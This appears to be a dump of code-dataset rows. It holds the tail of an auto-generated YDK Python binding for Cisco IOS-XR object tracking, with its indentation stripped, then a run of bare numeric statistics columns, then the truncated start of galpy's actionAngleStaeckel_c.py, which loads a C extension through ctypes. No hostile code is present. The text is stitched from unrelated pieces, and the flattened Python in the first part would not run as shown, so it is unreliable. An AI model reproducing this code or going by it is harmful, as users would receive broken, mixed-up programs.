from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo']['meta_info']
class BoolTracks(_Entity_):
"""
boolean objects
.. attribute:: bool_track_info
bool track info
**type**\: list of :py:class:`BoolTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks.BoolTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks, self).__init__()
self.yang_name = "bool-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("bool-track-info", ("bool_track_info", ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks.BoolTrackInfo))])
self._leafs = OrderedDict()
self.bool_track_info = YList(self)
self._segment_path = lambda: "bool-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks, [], name, value)
class BoolTrackInfo(_Entity_):
"""
bool track info
.. attribute:: object_name
Object Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: with_not
Track object with Not
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks.BoolTrackInfo, self).__init__()
self.yang_name = "bool-track-info"
self.yang_parent_name = "bool-tracks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('with_not', (YLeaf(YType.boolean, 'with-not'), ['bool'])),
])
self.object_name = None
self.track_state = None
self.with_not = None
self._segment_path = lambda: "bool-track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/bool-tracks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks.BoolTrackInfo, ['object_name', 'track_state', 'with_not'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks.BoolTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks']['meta_info']
class ThresholdTracks(_Entity_):
"""
Threshold objects
.. attribute:: threshold_track_info
threshold track info
**type**\: list of :py:class:`ThresholdTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks.ThresholdTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks, self).__init__()
self.yang_name = "threshold-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("threshold-track-info", ("threshold_track_info", ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks.ThresholdTrackInfo))])
self._leafs = OrderedDict()
self.threshold_track_info = YList(self)
self._segment_path = lambda: "threshold-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks, [], name, value)
class ThresholdTrackInfo(_Entity_):
"""
threshold track info
.. attribute:: object_name
Object name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state. True means track is up; False means track is down
**type**\: bool
**config**\: False
.. attribute:: weight
Weight is the number assigned to a track object . In case of a type threshold weight( i.e. weighted sum list), weight is asigned by User at the time of configuration. In case of a type threshold percentage (i.e. percentage based list), weight is internally computed by (1/N)x100, where N is the number of objects in the list
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: percentage
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks.ThresholdTrackInfo, self).__init__()
self.yang_name = "threshold-track-info"
self.yang_parent_name = "threshold-tracks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('weight', (YLeaf(YType.uint32, 'weight'), ['int'])),
])
self.object_name = None
self.track_state = None
self.weight = None
self._segment_path = lambda: "threshold-track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/threshold-tracks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks.ThresholdTrackInfo, ['object_name', 'track_state', 'weight'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks.ThresholdTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks']['meta_info']
class TrackingInteraces(_Entity_):
"""
Tracking Interfaces
.. attribute:: interface_tracking_info
interface tracking info
**type**\: list of :py:class:`InterfaceTrackingInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces.InterfaceTrackingInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces, self).__init__()
self.yang_name = "tracking-interaces"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracking-info", ("interface_tracking_info", ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces.InterfaceTrackingInfo))])
self._leafs = OrderedDict()
self.interface_tracking_info = YList(self)
self._segment_path = lambda: "tracking-interaces"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces, [], name, value)
class InterfaceTrackingInfo(_Entity_):
"""
interface tracking info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, self).__init__()
self.yang_name = "interface-tracking-info"
self.yang_parent_name = "tracking-interaces"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracking-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/tracking-interaces/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces.InterfaceTrackingInfo, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces.InterfaceTrackingInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces']['meta_info']
class Delayed(_Entity_):
"""
Is the state change delay counter in progress
.. attribute:: time_remaining
The time remaining in seconds for the counter to trigger state change
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: second
.. attribute:: track_state
State the track will transition to. Track state. True means track is up; False means track is down
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.Delayed, self).__init__()
self.yang_name = "delayed"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_remaining', (YLeaf(YType.uint32, 'time-remaining'), ['int'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.time_remaining = None
self.track_state = None
self._segment_path = lambda: "delayed"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.Delayed, ['time_remaining', 'track_state'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.Delayed']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route']['meta_info']
class TrackTypeInterfaceBrief(_Entity_):
"""
Object Tracking Type Interface brief info
.. attribute:: track_info_brief
track info brief
**type**\: list of :py:class:`TrackInfoBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterfaceBrief, self).__init__()
self.yang_name = "track-type-interface-brief"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-info-brief", ("track_info_brief", ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief))])
self._leafs = OrderedDict()
self.track_info_brief = YList(self)
self._segment_path = lambda: "track-type-interface-brief"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterfaceBrief, [], name, value)
class TrackInfoBrief(_Entity_):
"""
track info brief
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief, self).__init__()
self.yang_name = "track-info-brief"
self.yang_parent_name = "track-type-interface-brief"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.track_type_info = ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self._segment_path = lambda: "track-info-brief"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface-brief/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief, ['tracke_name', 'type', 'track_state'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info-brief"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface-brief/track-info-brief/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks']['meta_info']
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Ret Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief.TrackTypeInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterfaceBrief.TrackInfoBrief']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterfaceBrief']['meta_info']
def clone_ptr(self):
self._top_entity = ObjectTracking()
return self._top_entity
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking']['meta_info']
| 46.157886
| 771
| 0.493181
| 23,129
| 290,887
| 5.882269
| 0.01055
| 0.028401
| 0.035501
| 0.082712
| 0.982999
| 0.977876
| 0.966652
| 0.947336
| 0.927564
| 0.924139
| 0
| 0.014202
| 0.414463
| 290,887
| 6,301
| 772
| 46.165212
| 0.784571
| 0.181363
| 0
| 0.829339
| 0
| 0.021423
| 0.170769
| 0.091996
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095497
| false
| 0
| 0.034858
| 0
| 0.19862
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13cc58848c58d0776c91cbb7a9f6f7037c225a7a
| 24,579
|
py
|
Python
|
galpy/actionAngle/actionAngleStaeckel_c.py
|
turnergarrow/galpy
|
7132eddbf2dab491fe137790e31eacdc604b0534
|
[
"BSD-3-Clause"
] | 1
|
2019-02-28T08:54:38.000Z
|
2019-02-28T08:54:38.000Z
|
galpy/actionAngle/actionAngleStaeckel_c.py
|
BurcuAkbulut/galpy
|
cabb42bef3b4f88a2f593cdb123452cd41451db3
|
[
"BSD-3-Clause"
] | null | null | null |
galpy/actionAngle/actionAngleStaeckel_c.py
|
BurcuAkbulut/galpy
|
cabb42bef3b4f88a2f593cdb123452cd41451db3
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import sys
import distutils.sysconfig as sysconfig
import warnings
import ctypes
import ctypes.util
import numpy
from numpy.ctypeslib import ndpointer
from galpy.util import galpyWarning
from galpy.util import bovy_coords
#Find and load the library
_lib= None
outerr= None
PY3= sys.version > '3'
if PY3:
_ext_suffix= sysconfig.get_config_var('EXT_SUFFIX')
else: #pragma: no cover
_ext_suffix= '.so'
for path in sys.path:
try:
_lib = ctypes.CDLL(os.path.join(path,'galpy_actionAngle_c%s' % _ext_suffix))
except OSError as e:
if os.path.exists(os.path.join(path,'galpy_actionAngle_c%s' % _ext_suffix)): #pragma: no cover
outerr= e
_lib = None
else:
break
if _lib is None: #pragma: no cover
if not outerr is None:
warnings.warn("actionAngleStaeckel_c extension module not loaded, because of error '%s' " % outerr,
galpyWarning)
else:
warnings.warn("actionAngleStaeckel_c extension module not loaded, because galpy_actionAngle_c%s image was not found" % _ext_suffix,
galpyWarning)
_ext_loaded= False
else:
_ext_loaded= True
def actionAngleStaeckel_c(pot,delta,R,vR,vT,z,vz,u0=None,order=10):
"""
NAME:
actionAngleStaeckel_c
PURPOSE:
Use C to calculate actions using the Staeckel approximation
INPUT:
pot - Potential or list of such instances
delta - focal length of prolate spheroidal coordinates
R, vR, vT, z, vz - coordinates (arrays)
u0= (None) if set, u0 to use
order= (10) order of Gauss-Legendre integration of the relevant integrals
OUTPUT:
(jr,jz,err)
jr,jz : array, shape (len(R))
err - non-zero if error occured
HISTORY:
2012-12-01 - Written - Bovy (IAS)
"""
if u0 is None:
u0, dummy= bovy_coords.Rz_to_uv(R,z,delta=numpy.atleast_1d(delta))
#Parse the potential
from galpy.orbit.integrateFullOrbit import _parse_pot
npot, pot_type, pot_args= _parse_pot(pot,potforactions=True)
#Parse delta
delta= numpy.atleast_1d(delta)
ndelta= len(delta)
#Set up result arrays
jr= numpy.empty(len(R))
jz= numpy.empty(len(R))
err= ctypes.c_int(0)
#Set up the C code
ndarrayFlags= ('C_CONTIGUOUS','WRITEABLE')
actionAngleStaeckel_actionsFunc= _lib.actionAngleStaeckel_actions
